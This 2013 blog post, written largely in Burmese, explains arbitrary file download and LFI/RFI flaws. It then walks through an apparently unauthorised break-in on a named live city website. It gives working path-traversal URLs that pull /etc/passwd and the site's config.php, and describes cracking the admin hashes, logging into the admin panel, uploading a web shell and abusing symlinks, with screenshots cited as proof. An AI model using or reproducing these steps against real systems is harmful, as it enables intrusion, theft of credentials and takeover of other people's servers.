Subscribe For Free Updates!

We'll not spam mate! We promise.

Wednesday, May 29, 2013

Explaining Arbitrary File download/LFI/RFI & Exploiting Arbitrary File download vulnerability [TUT]

Arbitrary File download vulnerability နဲ ့ LFI/RFI က ရုတ္ရက္ျကည့္ရင္ ဆင္တူယိုးမွာနဲ ့မုိ ့ တခါတေလ ေရာေထြးတတ္ပါတယ္. ဒါေပမယ့္ exploit ဆက္လက္ျပ ုလုပ္သြားနိုင္ပံုခ်င္းေတာ့ မတူပါဖူး.
What is Arbitrary File download Vulnerability?
Web application server တစ္ခုဟာ user တစ္ေယာက္ request လုပ္တဲ့ file type ကို filter မလုပ္ထားမိရင္ဒီလိုမ်ိ ုး အေျခအေနမွာ any user က ဒီ server ရဲ ့ အေရးျကီးတဲ့ ဖိုင္ေတြ (eg../../etc/passwd or ../../etc/shadow etc .. ) ကို download ဆြဲယူျပီး sensitive information ေတြရယူသြားနိုင္ပါတယ္. ဒီ Arbitrary File download vul: ကို ေအာက္မွာ live hostတစ္ခုနဲ ့အဆင့္ဆင့္ေဖာက္ျပသြားပံုပါ ျပထားပါမယ္. ေအာက္မွာဆက္ျကည့္ျကေပါ့.



What is LFI & RFI?
ဒီေနရာမွာ LFI RFI အေျကာင္းကို အက်ယ္တဝင့္မရွင္းျပေတာ့ပါဖူး. Arbitrary File download နဲ ့ကြာပံုေလးပဲေျပာျပသြားမွာပါ. သူလည္းပဲ အေပါကလိုပဲ web app: server က path transverse<directory tranverse> နဲ ့sensitive file ေတြကို access ရမွာပါ.   LFI (local file inclusion) RFI(remote file inclusion) vulnerability. Web app: server က user input parameter ကို unfiltered မိတဲ့အခါမွာ LFI ဆိုရင္ local file ေတြကို path transverse ကေနျကည့္သလိုု  RFI ကေတာ့ remote malicious host တစ္ခုခုက file ေတြကို Urls ေတြနဲ ့ ဆြဲယူသံုးစြဲတာပါ. (both take advantage by unfiltered user input parameter). အိုေက ဒီေလာက္ဆို သေဘာေလးေတြ ကြဲကြဲျပားျပားသိေလာက္ပီထင္ပါတယ္. LFI RFI predominent ျဖစ္တာက php web application မွာအျဖစ္မ်ားပါတယ္.
အလြယ္ ေျပာရရင္ေတာ့ RFI/LFI က local web server application မွာ include() လုပ္ျပီး furthur exploitation (eg အေနနဲ ့ တစ္ခုေျပာပါမယ္, file inclusion ကေန writable log file ကို access လုပ္ျပီး code execute လုပ္ျပီး host ေပါမွာ shell upload တင္လို ့ရသလိုေပါ့ ) ဆက္လုပ္လို ့ရပါတယ္.
Arbitrary File download ကေတာ့ download ဆိုတဲ့အတိုင္း ျပီးမွ file view ျပီး ျကည့္ယံုတင္ေပါ့
Ok ဒါဆို ဆက္ဆြဲျကရေအာင္. ေအာက္မွာ arbitrary file download vul ဆိုက္ဒ္ေလးတစ္ခုနဲ ့ အဆင့္ဆင့္ ေဖာက္ျပသြားမွာပါ.
[ အမွန္မွန္ ရွာတာက whmcs xploit  ဟိီး .. ထြက္လာတာကို စမ္းမိတာက ဒလို :P ]
url ကိုျကည့္လိုက္ပါတယ္. ရနိုင္ေလာက္လားေပါ့ … ဒီလိုေလး
http://www.cityofindustry.org/scripts/dl.php?f=../uploads/files/specialevent.pdf
1
ျပီးေတာ့ စမ္းျကည့္ပါတယ္. /etc/passwd ဖိုင္ကို path transverse ကေန ရမရဆိုတာ..
2
Ok ေတြ ့တယ္မလား file size (7.5 KB) ေသခ်ာတယ္ ပါလာပီ sensitive information ေတြ :D
BooM!
http://www.cityofindustry.org/scripts/dl.php?f=/etc/passwd
eg few lines:

အနညး္ငယ္ပဲေရးျပထားတာပါ အကုန္သိခ်င္ရင္ေဒါင္းသာျကည့္ေတာ့ :D .
ျပီးေတာ့ က်ေနာ္ ထပ္ျပီး ေလ့လာပါတယ္. server ပိုင္းကို ဆက္မျကည့္ေတာ့ပဲ .. ဒီဆိုက္ဒ္ရဲ ့ config connect ပိုင္းကို ဆက္ ျကည့္ပါတယ္.
http://www.cityofindustry.org/configs.php
3
Error File Not Found ဆိုေတာ့ အဲ့တာမဟုတ္ေသးဖူး.. ဆက္ျကည့္ပါတယ္
ျဖစ္နိုင္တဲ့  /include/ or /includes/ အစရွိသျဖင့္ config ထားတတ္တဲ့ path ေတြတစ္ခုခ်င္းစီလိုက္စစ္ပါတယ္. ေတြ ့ပါျပီး
4
http://www.cityofindustry.org/include/ မွာ config.php ဖိုင္. နွိပ္ျကည့္ပါတယ္.
5
ဟားဟား ကံကေကာင္းျပီးရင္းေကာင္းပါပဲ path  disclosure ကိုပါျပေနပါတယ္. ဒါဆိုေအးေဆး config ဆီကို arbitrary file download vulnerability နဲ ့ download ခ်ပလိုက္ယံုပဲ.. ဒါဆို config ကို ဒီလိုေလး download ခ်ပါတယ္.
http://www.cityofindustry.org/scripts/dl.php?f=/home/coi/public_html/include/config.php
Ok config ရပါျပီ ..
6
အဲ့မွာ code ကိုေသခ်ာျကည့္ျကည့္ပါ သူ က php include ကိုသံုးထားသလားဆိုတာ OK ေတြ ့တယ္ေနာ္… ဒါဆို ခု config ထဲက login ေတြက admin panel ထဲ ဝင္ဖို ့ပါပဲ.
hash ေတြကို online md5 hash cracker ေတြနဲ ့တိုက္စစ္ျကည့္ပါတယ္.  ရပါတယ္ ခင္ဗ်ာ… :D .. ဟဲဟဲ.. admin panel ရွာယံုေပါ့ Ok ဆက္မယ္.
< admin panel ဘယ္မွာလဲ ဆိုတာ မေျပာျပေတာ့ဖူး… ကိုယ့္ဘာသာ logic နဲ ့ ဆိုက္ဒ္ တည္ေဆာက္ပံု page ယူသံုးတာကို ျကည့္လိုက္ရင္ လြယ္လြယ္ေလးပါ that’s your turn :D >
Ok ေတြ ့တယ္ ့ေနာ္ အထဲမွာ ေမာင္ဒုတ္ ေရာက္ေနပီ Lol …  ျပီးေတာ့ အားလံုးသိျကတဲ့အတိုင္း file upload ေနရာကေန shell upload တင္ျပီး site control ရယူလိုက္ပါတယ္.
proof:
7
8
ျပီးေတာ့ ဒီ host က easily symlink  လုပ္လို ့ ျဖစ္ပါတယ္.
proof:
9


[>] – Have Fun Sexy :D
[>] - Ref : http://dongoth.com/

Please Give Us Your 1 Minute In Sharing This Post!
SOCIALIZE IT →
FOLLOW US →
SHARE IT →
Powered By: BloggerYard.Com

0 comments:

Post a Comment